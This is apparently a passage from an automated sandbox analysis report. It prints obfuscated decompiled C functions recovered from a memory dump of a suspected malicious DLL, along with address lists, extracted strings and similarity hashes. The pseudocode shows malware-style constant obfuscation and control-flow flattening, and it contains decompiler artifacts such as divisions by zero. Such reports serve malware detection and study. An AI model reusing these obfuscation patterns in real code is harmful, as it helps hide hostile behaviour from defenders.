				_v1732 = _v1732 ^ 0x7849ec4a;
				_v1636 = 0x729644;
				_v1636 = _v1636 ^ 0x0bca1264;
				_v1636 = _v1636 ^ 0x0bb40509;
				_v1644 = 0xc54f6c;
				_v1644 = _v1644 ^ 0x6ee24221;
				_v1644 = _v1644 ^ 0x6e219b87;
				_v1668 = 0x271be0;
				_v1668 = _v1668 + 0xffff15b2;
				_v1668 = _v1668 + 0xffff0ed9;
				_v1668 = _v1668 ^ 0x002aecd1;
				_v1708 = 0xa32dfa;
				_push(0x65);
				_push(0x4f);
				_v1708 = _v1708 * 0x3a;
				_v1708 = _v1708 ^ 0x9ddf7a65;
				_v1708 = _v1708 >> 0xe;
				_v1708 = _v1708 ^ 0x00065b22;
				_v1716 = 0xddf7db;
				_v1716 = _v1716 << 0xf;
				_v1716 = _v1716 / 0;
				_v1716 = _v1716 + 0xffff785f;
				_v1716 = _v1716 ^ 0x0273d33e;
				_v1676 = 0xa1b7d3;
				_v1676 = _v1676 ^ 0x1caa682e;
				_v1676 = _v1676 + 0xffff4883;
				_v1676 = _v1676 ^ 0x1c040e07;
				_v1628 = 0x71371c;
				_v1628 = _v1628 >> 0xb;
				_v1628 = _v1628 ^ 0x000b99b2;
				_v1612 = 0x73a39d;
				_v1612 = _v1612 | 0xc86b56fe;
				_v1612 = _v1612 ^ 0xc87b6c6b;
				_v1700 = 0x74796b;
				_v1700 = _v1700 ^ 0x20dbdb1d;
				_v1700 = _v1700 << 4;
				_push(0x31);
				_v1700 = _v1700 / 0;
				_v1700 = _v1700 ^ 0x002f2d01;
				_v1620 = 0x2a7282;
				_v1620 = _v1620 << 1;
				_v1620 = _v1620 ^ 0x00553ec8;
				_v1664 = 0x649d13;
				_v1664 = _v1664 + 0x31da;
				_v1664 = _v1664 + 0x8124;
				_v1664 = _v1664 ^ 0x00679fcd;
				_v1680 = 0x27c7a4;
				_v1680 = _v1680 + 0xffff1cb0;
				_push(0x35);
				_v1680 = _v1680 / 0;
				_v1680 = _v1680 ^ 0x00010d7f;
				_v1656 = 0x6e9507;
				_v1656 = _v1656 ^ 0x3787a6c7;
				_v1656 = _v1656 + 0xffff7e9e;
				_v1656 = _v1656 ^ 0x37e0cdff;
				_v1604 = 0x87d97e;
				_v1604 = _v1604 >> 0xc;
				_v1604 = _v1604 ^ 0x000291fd;
				_v1608 = 0xb24805;
				_v1608 = _v1608 ^ 0x552bf4c7;
				_v1608 = _v1608 ^ 0x559968ad;
				_v1600 = 0xb2a5b2;
				_v1600 = _v1600 << 5;
				_v1600 = _v1600 ^ 0x1656dfde;
				_v1756 = 0x4030f6;
				_v1756 = _v1756 / 0;
				_v1756 = _v1756 >> 0xd;
				_v1756 = _v1756 + 0xffff8690;
				_v1756 = _v1756 ^ 0xfffa6009;
				_v1696 = 0xc38ab2;
				_v1696 = _v1696 >> 3;
				_v1696 = _v1696 | 0x7596d107;
				_v1696 = _v1696 ^ 0x75947f2e;
				_v1616 = 0x3b7294;
				_v1616 = _v1616 + 0x5e34;
				_v1616 = _v1616 ^ 0x003c7f15;
				_v1768 = 0x5014dc;
				_v1768 = _v1768 | 0x5765cf7b;
				_v1768 = _v1768 ^ 0x932a5911;
				_push(0xb);
				_push(0x12);
				_v1768 = _v1768 * 7;
				_v1768 = _v1768 ^ 0x5e95f08d;
				_v1692 = 0x2cf7f9;
				_v1692 = _v1692 / 0;
				_v1692 = _v1692 + 0xffffdc4f;
				_v1692 = _v1692 ^ 0x000e99f9;
				_v1672 = 0x8607af;
				_v1672 = _v1672 >> 5;
				_push(0x1e);
				_v1672 = _v1672 * 0x7c;
				_v1672 = _v1672 ^ 0x020b3bd4;
				_v1740 = 0x8b357;
				_v1740 = _v1740 + 0xff9a;
				_v1740 = _v1740 * 0x3e;
				_v1740 = _v1740 | 0x7a81551e;
				_v1740 = _v1740 ^ 0x7adbb53d;
				_v1748 = 0xd8916a;
				_v1748 = _v1748 / 0;
				_v1748 = _v1748 + 0x279f;
				_v1748 = _v1748 ^ 0x01ee1cc0;
				_v1748 = _v1748 ^ 0x01ebd722;
				_v1592 = 0x2eb6c9;
				_v1592 = _v1592 + 0xfffff717;
				_v1592 = _v1592 ^ 0x002fa07b;
				_v1588 = 0xecea68;
				_v1588 = _v1588 + 0x6bb0;
				_v1588 = _v1588 ^ 0x00e4edc5;
				_v1712 = 0xb916ec;
				_v1712 = _v1712 >> 0x10;
				_push(0x38);
				_v1712 = _v1712 * 0x1f;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0x000e71a1;
				_v1640 = 0xbdd879;
				_v1640 = _v1640 ^ 0xfb501327;
				_v1640 = _v1640 ^ 0xfbe3ff27;
				_v1688 = 0x296340;
				_v1688 = _v1688 + 0xffff5d40;
				_v1688 = _v1688 + 0xffff80a1;
				_v1688 = _v1688 ^ 0x002bae4a;
				_v1684 = 0xcdb105;
				_v1684 = _v1684 >> 0xe;
				_v1684 = _v1684 >> 3;
				_v1684 = _v1684 ^ 0x00098115;
				_v1720 = 0xd1119b;
				_v1720 = _v1720 / 0;
				_v1720 = _v1720 / 0;
				_v1720 = _v1720 << 7;
				_v1720 = _v1720 ^ 0x0000fc8f;
				_v1648 = 0x21d7a9;
				_v1648 = _v1648 ^ 0x402bc604;
				_v1648 = _v1648 ^ 0x400b1c51;
				_v1744 = 0x520494;
				_v1744 = _v1744 ^ 0xdba658f8;
				_v1744 = _v1744 | 0xbfdddabb;
				_v1744 = _v1744 ^ 0xffff77f6;
				_t490 = _v1584;
				_v1632 = 0x488367;
				_v1632 = _v1632 | 0x5f97e0b2;
				_v1632 = _v1632 ^ 0x5fd7979b;
				_v1652 = 0x9feaaa;
				_v1652 = _v1652 + 0x93eb;
				_v1652 = _v1652 << 1;
				_v1652 = _v1652 ^ 0x01412aa9;
				_v1660 = 0x982e55;
				_v1660 = _v1660 + 0xffff85fd;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0x02507e69;
				while(1) {
					L1:
					_t505 = 0x5c;
					while(1) {
						L2:
						_t468 = 0xd29bca3;
						do {
							L3:
							if(_t553 == 0x533aa81) {
								_push(_v1644);
								_push(_v1636);
								_push(_v1732);
								_t469 = E1000416C(_v1724, 0x10001804);
								E1000FE15( &_v1040, __eflags);
								__eflags =  *0x10025208 + 0x230;
								E1000FFBA( &_v520,  &_v1040, _v1668, _v1708,  *0x10025208 + 0x230,  &_v1560, _v1716, 0x104, _v1676, _t469, _v1628);
								E1000B952(_v1612, _t469, _v1700, _v1620);
								_t558 =  &(_t558[0xf]);
								_t553 = 0x80a074b;
								goto L19;
							} else {
								if(_t553 == 0x7922d29) {
									_push(_v1604);
									_push(_v1656);
									_push(_v1680);
									_t511 = _v1664;
									__eflags = E100169EB(E1000416C(_v1664, 0x10001894),  &_v1580, _v1664, _v1608, _v1664, _v1600, _v1756, _v1696, _v1616, _v1764, _v1768, _v1736, _v1692, _t511, _t511, _v1672);
									_t553 =  ==  ? 0xd29bca3 : 0x870075b;
									E1000B952(_v1740, _t477, _v1748, _v1592);
									_t558 =  &(_t558[0x14]);
									L19:
									_t468 = 0xd29bca3;
									_t505 = 0x5c;
									goto L20;
								} else {
									if(_t553 == 0x80a074b) {
										_t492 =  *0x10025208 + 0x1c;
										while(1) {
											__eflags =  *_t492 - _t505;
											if( *_t492 == _t505) {
												break;
											}
											_t492 = _t492 + 2;
											__eflags = _t492;
										}
										_t490 = _t492 + 2;
										_t553 = 0x7922d29;
										goto L2;
									} else {
										if(_t553 == _t468) {
											_t485 = E10006424(2 + E100047C5(_v1588, _v1640,  &_v1560) * 2, _v1688, 2 + E100047C5(_v1588, _v1640,  &_v1560) * 2, _v1684,  &_v1560, _v1720, _v1580, _v1648, _v1744, _v1596, _t490, _v1632);
											_t558 =  &(_t558[0xa]);
											__eflags = _t485;
											_t553 = 0xe177b10;
											_v1584 = 0 | _t485 == 0x00000000;
											goto L1;
										} else {
											if(_t553 == 0xdbf6f02) {
												_push(_t505);
												E1000441F(_v1752, _v1728, _v1624, _v1760,  &_v520, _t505, _v1704);
												_t558 =  &(_t558[7]);
												_t553 = 0x533aa81;
												while(1) {
													L1:
													_t505 = 0x5c;
													L2:
													_t468 = 0xd29bca3;
													goto L3;
												}
											} else {
												if(_t553 != 0xe177b10) {
													goto L20;
												} else {
													E10001AE5(_v1580, _v1652, _v1660);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1584;
							L20:
							__eflags = _t553 - 0x870075b;
						} while (_t553 != 0x870075b);
						goto L10;
					}
				}
			}

0x1000f217
0x1000f21d
0x1000f22a
0x1000f233
0x1000f23a
0x1000f245
0x1000f24d
0x1000f252
0x1000f257
0x1000f25f
0x1000f267
0x1000f26f
0x1000f27f
0x1000f281
0x1000f288
0x1000f290
0x1000f292
0x1000f298
0x1000f29d
0x1000f2a5
0x1000f2b3
0x1000f2b5
0x1000f2b9
0x1000f2be
0x1000f2c3
0x1000f2cb
0x1000f2de
0x1000f2e5
0x1000f2f0
0x1000f2f8
0x1000f300
0x1000f310
0x1000f314
0x1000f31c
0x1000f327
0x1000f32f
0x1000f33a
0x1000f342
0x1000f34a
0x1000f352
0x1000f35a
0x1000f362
0x1000f370
0x1000f374
0x1000f37c
0x1000f384
0x1000f38c
0x1000f394
0x1000f399
0x1000f39e
0x1000f3a6
0x1000f3ae
0x1000f3b6
0x1000f3c0
0x1000f3c4
0x1000f3cc
0x1000f3d4
0x1000f3df
0x1000f3ea
0x1000f3f5
0x1000f400
0x1000f40b
0x1000f416
0x1000f420
0x1000f428
0x1000f430
0x1000f438
0x1000f445
0x1000f448
0x1000f44a
0x1000f44e
0x1000f456
0x1000f45b
0x1000f463
0x1000f46b
0x1000f478
0x1000f47c
0x1000f484
0x1000f48c
0x1000f494
0x1000f49c
0x1000f4a4
0x1000f4ac
0x1000f4b7
0x1000f4bf
0x1000f4ca
0x1000f4d5
0x1000f4e0
0x1000f4eb
0x1000f4f3
0x1000f4fb
0x1000f507
0x1000f509
0x1000f50f
0x1000f517
0x1000f522
0x1000f529
0x1000f534
0x1000f53c
0x1000f544
0x1000f54c
0x1000f554
0x1000f55c
0x1000f56b
0x1000f56d
0x1000f573
0x1000f57b
0x1000f586
0x1000f591
0x1000f59c
0x1000f5a7
0x1000f5b2
0x1000f5ba
0x1000f5c5
0x1000f5d0
0x1000f5db
0x1000f5e6
0x1000f5f1
0x1000f5f9
0x1000f604
0x1000f613
0x1000f617
0x1000f61c
0x1000f624
0x1000f62c
0x1000f634
0x1000f639
0x1000f643
0x1000f64b
0x1000f656
0x1000f661
0x1000f66c
0x1000f674
0x1000f67c
0x1000f689
0x1000f68c
0x1000f68e
0x1000f692
0x1000f69a
0x1000f6aa
0x1000f6ae
0x1000f6b6
0x1000f6be
0x1000f6c6
0x1000f6d1
0x1000f6d3
0x1000f6d7
0x1000f6df
0x1000f6e7
0x1000f6f4
0x1000f6f8
0x1000f700
0x1000f708
0x1000f718
0x1000f71c
0x1000f724
0x1000f72c
0x1000f734
0x1000f73f
0x1000f74a
0x1000f755
0x1000f760
0x1000f76b
0x1000f776
0x1000f77e
0x1000f789
0x1000f78b
0x1000f78f
0x1000f794
0x1000f79c
0x1000f7a7
0x1000f7b2
0x1000f7bd
0x1000f7c5
0x1000f7cd
0x1000f7d5
0x1000f7dd
0x1000f7e5
0x1000f7ea
0x1000f7ef
0x1000f7f7
0x1000f807
0x1000f812
0x1000f816
0x1000f81b
0x1000f823
0x1000f82e
0x1000f839
0x1000f849
0x1000f851
0x1000f859
0x1000f861
0x1000f869
0x1000f870
0x1000f87b
0x1000f886
0x1000f891
0x1000f89c
0x1000f8a7
0x1000f8ae
0x1000f8b9
0x1000f8c1
0x1000f8c9
0x1000f8ce
0x1000f8d6
0x1000f8d6
0x1000f8d8
0x1000f8d9
0x1000f8d9
0x1000f8d9
0x1000f8de
0x1000f8de
0x1000f8e4
0x1000faad
0x1000fab9
0x1000fac0
0x1000fac8
0x1000fad6
0x1000fb07
0x1000fb29
0x1000fb45
0x1000fb4a
0x1000fb4d
0x00000000
0x1000f8ea
0x1000f8ec
0x1000fa14
0x1000fa20
0x1000fa27
0x1000fa2b
0x1000fa87
0x1000fa9d
0x1000faa0
0x1000faa5
0x1000fb52
0x1000fb54
0x1000fb59
0x00000000
0x1000f8f2
0x1000f8f8
0x1000f9fd
0x1000fa05
0x1000fa05
0x1000fa08
0x00000000
0x00000000
0x1000fa02
0x1000fa02
0x1000fa02
0x1000fa0a
0x1000fa0d
0x00000000
0x1000f8fe
0x1000f900
0x1000f9d7
0x1000f9de
0x1000f9e1
0x1000f9e3
0x1000f9eb
0x00000000
0x1000f902
0x1000f908
0x1000f940
0x1000f961
0x1000f966
0x1000f969
0x1000f8d6
0x1000f8d6
0x1000f8d8
0x1000f8d9
0x1000f8d9
0x00000000
0x1000f8d9
0x1000f90a
0x1000f910
0x00000000
0x1000f916
0x1000f928
0x1000f92d
0x1000f910
0x1000f908
0x1000f900
0x1000f8f8
0x1000f8ec
0x1000f92e
0x1000f93f
0x1000fb5a
0x1000fb5a
0x1000fb5a
0x00000000
0x1000fb66
0x1000f8d9

Strings

JIx, xrefs: 1000F3CC
@c), xrefs: 1000F7BD
4^, xrefs: 1000F656
f*, xrefs: 1000F33A
kyt, xrefs: 1000F4EB
!Bn, xrefs: 1000F400
h, xrefs: 1000F755

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: !Bn$4^$@c)$JIx$h$kyt$f*
API String ID: 0-2204806497
Opcode ID: 3be2a1623fb923a99b8654f4a9e48327b798708f933ba896a3830b496c4d6a53
Instruction ID: d7d032f409c123e6662870d9b5b6d0ad2726a81a5196c9f3a1e79d36a6cc730a
Opcode Fuzzy Hash: 3be2a1623fb923a99b8654f4a9e48327b798708f933ba896a3830b496c4d6a53
Instruction Fuzzy Hash: AA2223715093819FD368CF25C98AA9FBBE1FBC4748F10891DE2D986260DBB18949DF07

Uniqueness

Uniqueness Score: -1.00%

Function 1001BE1F, Relevance: 9.0, Strings: 7, Instructions: 294
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E1001BE1F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				intOrPtr _t322;
				void* _t332;
				void* _t338;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int* _t396;

				_t396 =  &_v1176;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0x55f93f;
				_t338 = 0x255186a;
				_v1052 = 0xd464b8;
				_v1048 = 0x3b426a;
				_v1100 = 0xc4352;
				_v1100 = _v1100 << 0xb;
				_v1100 = _v1100 ^ 0x62113d42;
				_v1120 = 0x72c434;
				_t382 = 0x51;
				_v1120 = _v1120 / _t382;
				_t383 = 0x6f;
				_v1120 = _v1120 / _t383;
				_v1120 = _v1120 ^ 0x000db72e;
				_v1092 = 0x48324a;
				_v1092 = _v1092 << 0xa;
				_v1092 = _v1092 ^ 0x20c9a173;
				_v1140 = 0xe3c9e;
				_t384 = 0x2f;
				_v1140 = _v1140 / _t384;
				_v1140 = _v1140 | 0x63c5babf;
				_v1140 = _v1140 ^ 0x63cb5ea5;
				_v1160 = 0x6f4de1;
				_v1160 = _v1160 << 3;
				_v1160 = _v1160 + 0xdf9e;
				_t385 = 0x4d;
				_v1160 = _v1160 / _t385;
				_v1160 = _v1160 ^ 0x0007372d;
				_v1068 = 0xc21696;
				_t386 = 0x5b;
				_v1068 = _v1068 * 0x5e;
				_v1068 = _v1068 ^ 0x474f8ca0;
				_v1124 = 0xf5a6df;
				_v1124 = _v1124 + 0x8ca;
				_v1124 = _v1124 + 0xffffa7cd;
				_v1124 = _v1124 ^ 0x00fd7ab0;
				_v1084 = 0x749f5b;
				_v1084 = _v1084 ^ 0x62dc1e7c;
				_v1084 = _v1084 ^ 0x62a482e2;
				_v1176 = 0xd91d8c;
				_v1176 = _v1176 >> 0xc;
				_v1176 = _v1176 / _t386;
				_v1176 = _v1176 + 0xffffecc9;
				_v1176 = _v1176 ^ 0xfffae86a;
				_v1108 = 0x87bc5b;
				_v1108 = _v1108 >> 2;
				_v1108 = _v1108 >> 2;
				_v1108 = _v1108 ^ 0x00059a8b;
				_v1168 = 0x5e6e7f;
				_v1168 = _v1168 * 0xd;
				_v1168 = _v1168 << 2;
				_v1168 = _v1168 + 0x7d52;
				_v1168 = _v1168 ^ 0x1321aea7;
				_v1172 = 0xecfd53;
				_v1172 = _v1172 + 0x4be0;
				_v1172 = _v1172 + 0xffffe45e;
				_v1172 = _v1172 + 0x4a7c;
				_v1172 = _v1172 ^ 0x00ec3c05;
				_v1076 = 0xeb9d07;
				_v1076 = _v1076 << 0xf;
				_v1076 = _v1076 ^ 0xce864c75;
				_v1060 = 0x89591;
				_v1060 = _v1060 | 0xaa2e28d1;
				_v1060 = _v1060 ^ 0xaa2d8820;
				_v1064 = 0xa134c5;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x13431e67;
				_v1156 = 0x48c028;
				_v1156 = _v1156 ^ 0x25df29ba;
				_t387 = 0x26;
				_v1156 = _v1156 / _t387;
				_t388 = 0x4c;
				_v1156 = _v1156 / _t388;
				_v1156 = _v1156 ^ 0x000d264a;
				_v1164 = 0xaf936e;
				_v1164 = _v1164 >> 4;
				_t389 = 0x43;
				_v1164 = _v1164 / _t389;
				_v1164 = _v1164 + 0xa3eb;
				_v1164 = _v1164 ^ 0x0006a8d5;
				_v1132 = 0xf8c99;
				_t390 = 0x73;
				_v1132 = _v1132 * 0x4a;
				_v1132 = _v1132 + 0x258e;
				_v1132 = _v1132 ^ 0x04727f62;
				_v1096 = 0xb75723;
				_v1096 = _v1096 | 0x9f41fda0;
				_v1096 = _v1096 ^ 0x9ff96f50;
				_v1144 = 0xd00d28;
				_v1144 = _v1144 / _t390;
				_t391 = 0x59;
				_v1144 = _v1144 * 0xc;
				_v1144 = _v1144 ^ 0x0012f13b;
				_v1148 = 0x3466f3;
				_v1148 = _v1148 | 0x3c86922e;
				_v1148 = _v1148 ^ 0x8d93df82;
				_v1148 = _v1148 ^ 0xb12144be;
				_v1116 = 0x7b330e;
				_v1116 = _v1116 + 0xffffb20a;
				_v1116 = _v1116 | 0x667869db;
				_v1116 = _v1116 ^ 0x6672659c;
				_v1080 = 0x8eb6e0;
				_v1080 = _v1080 >> 9;
				_v1080 = _v1080 ^ 0x000eeae3;
				_v1088 = 0x3bca65;
				_v1088 = _v1088 * 0x38;
				_v1088 = _v1088 ^ 0x0d1911c7;
				_v1128 = 0xa36268;
				_v1128 = _v1128 / _t391;
				_v1128 = _v1128 ^ 0x3d5f80ab;
				_v1128 = _v1128 ^ 0x3d5fd5cd;
				_v1136 = 0xd8e875;
				_v1136 = _v1136 ^ 0xe4261a9b;
				_v1136 = _v1136 ^ 0x7b1e7eca;
				_v1136 = _v1136 ^ 0x9fe507de;
				_v1104 = 0xb85cde;
				_v1104 = _v1104 | 0x4a903c36;
				_v1104 = _v1104 + 0xffffad08;
				_v1104 = _v1104 ^ 0x4abae40d;
				_v1072 = 0x2b868f;
				_t392 = 0x5d;
				_v1072 = _v1072 / _t392;
				_v1072 = _v1072 ^ 0x000973eb;
				_v1112 = 0x34de84;
				_v1112 = _v1112 ^ 0x28518a69;
				_t393 = 0x45;
				_v1112 = _v1112 / _t393;
				_v1112 = _v1112 ^ 0x0096a9aa;
				_v1152 = 0x744284;
				_v1152 = _v1152 >> 5;
				_v1152 = _v1152 | 0xfd195865;
				_v1152 = _v1152 ^ 0xfd1fc3f2;
				do {
					while(_t338 != 0x255186a) {
						if(_t338 == 0x3802fa3) {
							E1002266F( &_v1040, _v1064, _v1156, _v1164, _v1132);
							E100092E7(_v1096, _v1144, _v1148,  &_v1040, _v1116, _t338,  &_v1040);
							E1000D4EE( &_v520,  &_v1040, __eflags, _v1080, _v1088);
							_t396 =  &(_t396[0xb]);
							_t338 = 0xfbaa45d;
							continue;
						}
						if(_t338 == 0x458c308) {
							_push(_v1124);
							_push(_v1068);
							_push(_v1160);
							E100049CE( *0x10025208 + 0x230,  *0x10025208 + 0x1c, E1000416C(_v1140, 0x100017d4), _v1084, _v1176, _v1140, _v1108, _v1168);
							E1000B952(_v1172, _t327, _v1076, _v1060);
							_t396 =  &(_t396[0xc]);
							_t338 = 0x3802fa3;
							continue;
						}
						if(_t338 == 0x9b38e60) {
							_t332 = E10019EB5();
							L10:
							_t338 = 0x458c308;
							continue;
						}
						if(_t338 == 0xdb76f1b) {
							_t332 = E1001D8AD();
							goto L10;
						}
						if(_t338 != 0xfbaa45d) {
							goto L17;
						}
						 *((short*)(E10001A5C( &_v520, _v1128, _v1136))) = 0;
						return E1000A64F(_v1104, _v1112, _v1152,  &_v520);
					}
					_t322 =  *0x10025208;
					__eflags =  *((intOrPtr*)(_t322 + 0xc));
					if( *((intOrPtr*)(_t322 + 0xc)) == 0) {
						_t338 = 0x9b38e60;
						goto L17;
					}
					_t338 = 0xdb76f1b;
					continue;
					L17:
					__eflags = _t338 - 0xc5a8f2b;
				} while (_t338 != 0xc5a8f2b);
				return _t332;
			}

0x1001be1f
0x1001be25
0x1001be2f
0x1001be37
0x1001be3c
0x1001be44
0x1001be4f
0x1001be57
0x1001be5c
0x1001be64
0x1001be76
0x1001be7b
0x1001be85
0x1001be8a
0x1001be90
0x1001be98
0x1001bea0
0x1001bea5
0x1001bead
0x1001beb9
0x1001bebe
0x1001bec4
0x1001becc
0x1001bed4
0x1001bedc
0x1001bee1
0x1001beed
0x1001bef2
0x1001bef8
0x1001bf00
0x1001bf13
0x1001bf14
0x1001bf18
0x1001bf20
0x1001bf28
0x1001bf30
0x1001bf38
0x1001bf40
0x1001bf48
0x1001bf50
0x1001bf58
0x1001bf60
0x1001bf6b
0x1001bf6f
0x1001bf77
0x1001bf7f
0x1001bf87
0x1001bf8c
0x1001bf91
0x1001bf99
0x1001bfa6
0x1001bfaa
0x1001bfaf
0x1001bfb7
0x1001bfbf
0x1001bfc7
0x1001bfcf
0x1001bfd9
0x1001bfe1
0x1001bfe9
0x1001bff1
0x1001bff6
0x1001bffe
0x1001c009
0x1001c014
0x1001c01f
0x1001c02a
0x1001c032
0x1001c03d
0x1001c045
0x1001c053
0x1001c058
0x1001c062
0x1001c067
0x1001c06d
0x1001c075
0x1001c07d
0x1001c086
0x1001c08b
0x1001c091
0x1001c099
0x1001c0a1
0x1001c0ae
0x1001c0b1
0x1001c0b5
0x1001c0bd
0x1001c0c5
0x1001c0cd
0x1001c0d5
0x1001c0dd
0x1001c0ed
0x1001c0f6
0x1001c0f7
0x1001c0fb
0x1001c103
0x1001c10b
0x1001c113
0x1001c11b
0x1001c123
0x1001c12b
0x1001c133
0x1001c13b
0x1001c143
0x1001c14b
0x1001c150
0x1001c158
0x1001c165
0x1001c169
0x1001c171
0x1001c17f
0x1001c183
0x1001c18b
0x1001c193
0x1001c19b
0x1001c1a3
0x1001c1ad
0x1001c1ba
0x1001c1c7
0x1001c1d4
0x1001c1dc
0x1001c1e4
0x1001c1f2
0x1001c1f7
0x1001c1fd
0x1001c205
0x1001c20d
0x1001c219
0x1001c21c
0x1001c220
0x1001c228
0x1001c230
0x1001c235
0x1001c23d
0x1001c245
0x1001c245
0x1001c257
0x1001c36b
0x1001c38d
0x1001c3ae
0x1001c3b3
0x1001c3b6
0x00000000
0x1001c3b6
0x1001c25f
0x1001c2db
0x1001c2e4
0x1001c2eb
0x1001c326
0x1001c33f
0x1001c344
0x1001c347
0x00000000
0x1001c347
0x1001c263
0x1001c2d4
0x1001c2c5
0x1001c2c5
0x00000000
0x1001c2c5
0x1001c267
0x1001c2c0
0x00000000
0x1001c2c0
0x1001c26f
0x00000000
0x00000000
0x1001c28b
0x00000000
0x1001c2ae
0x1001c3c0
0x1001c3c5
0x1001c3c9
0x1001c3d2
0x00000000
0x1001c3d2
0x1001c3cb
0x00000000
0x1001c3d4
0x1001c3d4
0x1001c3d4
0x00000000

Strings

J&, xrefs: 1001C06D
|J, xrefs: 1001BFD9
J2H, xrefs: 1001BE98
Mo, xrefs: 1001BED4
R}, xrefs: 1001BFAF
jB;, xrefs: 1001BE44
s, xrefs: 1001C1FD

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: J&$J2H$R}$jB;$|J$Mo$s
API String ID: 0-3668108459
Opcode ID: 484d21de584122ed61c3095471469040db5a11e73d2ec0a7c60938d2b7cbf59e
Instruction ID: 1a4be4cbcaa0a867ea4ce0003ac23e20e653c80428b5b629780bce7e175b5457
Opcode Fuzzy Hash: 484d21de584122ed61c3095471469040db5a11e73d2ec0a7c60938d2b7cbf59e
Instruction Fuzzy Hash: EAE110715083809BD368CF61C489A5FBBE1FBC4758F10891DF29A9A260C7B5DA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 1001713E, Relevance: 9.0, Strings: 7, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E1001713E(signed int* __edx) {
				void* __ecx;
				void* _t233;
				signed int _t264;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t274;
				signed int* _t304;
				intOrPtr* _t309;
				void* _t310;
				void* _t312;
				void* _t315;

				_t309 = _t310 - 0x70;
				_t307 =  *((intOrPtr*)(_t309 + 0x78));
				_push( *((intOrPtr*)(_t309 + 0x7c)));
				_t304 = __edx;
				_push( *((intOrPtr*)(_t309 + 0x78)));
				_push(__edx);
				E100167B8(_t233);
				 *(_t309 + 4) =  *(_t309 + 4) & 0x00000000;
				_t312 = _t310 - 0x9c + 0x10;
				 *_t309 = 0x19add0;
				 *(_t309 + 0x50) = 0x7e6108;
				_t274 = 0x214dbc8;
				_t268 = 0x62;
				 *(_t309 + 0x50) =  *(_t309 + 0x50) / _t268;
				 *(_t309 + 0x50) =  *(_t309 + 0x50) >> 0xe;
				 *(_t309 + 0x50) =  *(_t309 + 0x50) ^ 0x00000005;
				 *(_t309 + 0x38) = 0x3b029e;
				 *(_t309 + 0x38) =  *(_t309 + 0x38) | 0xd2df3721;
				 *(_t309 + 0x38) =  *(_t309 + 0x38) ^ 0xd2f1ba4e;
				 *(_t309 + 0x40) = 0x64262;
				_t269 = 0x1e;
				 *(_t309 + 0x40) =  *(_t309 + 0x40) * 0x1e;
				 *(_t309 + 0x40) =  *(_t309 + 0x40) >> 0xd;
				 *(_t309 + 0x40) =  *(_t309 + 0x40) ^ 0x00023052;
				 *(_t309 + 0x54) = 0xd2be96;
				 *(_t309 + 0x54) =  *(_t309 + 0x54) + 0xffff256b;
				 *(_t309 + 0x54) =  *(_t309 + 0x54) + 0xf1e2;
				 *(_t309 + 0x54) =  *(_t309 + 0x54) ^ 0x00d8cec0;
				 *(_t309 + 0x5c) = 0x303cfe;
				 *(_t309 + 0x5c) =  *(_t309 + 0x5c) + 0x67e8;
				 *(_t309 + 0x5c) =  *(_t309 + 0x5c) << 3;
				 *(_t309 + 0x5c) =  *(_t309 + 0x5c) + 0xffff4519;
				 *(_t309 + 0x5c) =  *(_t309 + 0x5c) ^ 0x018a26e3;
				 *(_t309 + 0x34) = 0x29bca0;
				 *(_t309 + 0x34) =  *(_t309 + 0x34) + 0xffff78aa;
				 *(_t309 + 0x34) =  *(_t309 + 0x34) ^ 0x002f48dc;
				 *(_t309 + 0x6c) = 0x93f093;
				 *(_t309 + 0x6c) =  *(_t309 + 0x6c) + 0xffffd419;
				 *(_t309 + 0x6c) =  *(_t309 + 0x6c) >> 0xc;
				 *(_t309 + 0x6c) =  *(_t309 + 0x6c) ^ 0xa04bb409;
				 *(_t309 + 0x6c) =  *(_t309 + 0x6c) ^ 0xa04f43f7;
				 *(_t309 + 0x64) = 0x204f57;
				 *(_t309 + 0x64) =  *(_t309 + 0x64) << 3;
				 *(_t309 + 0x64) =  *(_t309 + 0x64) + 0xc886;
				 *(_t309 + 0x64) =  *(_t309 + 0x64) + 0xffff8f10;
				 *(_t309 + 0x64) =  *(_t309 + 0x64) ^ 0x0105bbb1;
				 *(_t309 + 0x24) = 0x784e57;
				 *(_t309 + 0x24) =  *(_t309 + 0x24) << 0xd;
				 *(_t309 + 0x24) =  *(_t309 + 0x24) ^ 0x09ca110e;
				 *(_t309 + 0x18) = 0xc7bdb9;
				 *(_t309 + 0x18) =  *(_t309 + 0x18) / _t269;
				 *(_t309 + 0x18) =  *(_t309 + 0x18) ^ 0x00062fff;
				 *(_t309 + 0x68) = 0xf7569e;
				 *(_t309 + 0x68) =  *(_t309 + 0x68) ^ 0xf0d57157;
				 *(_t309 + 0x68) =  *(_t309 + 0x68) * 5;
				 *(_t309 + 0x68) =  *(_t309 + 0x68) ^ 0xa33d82a0;
				 *(_t309 + 0x68) =  *(_t309 + 0x68) ^ 0x13997cbe;
				 *(_t309 + 0x20) = 0xf2ce0c;
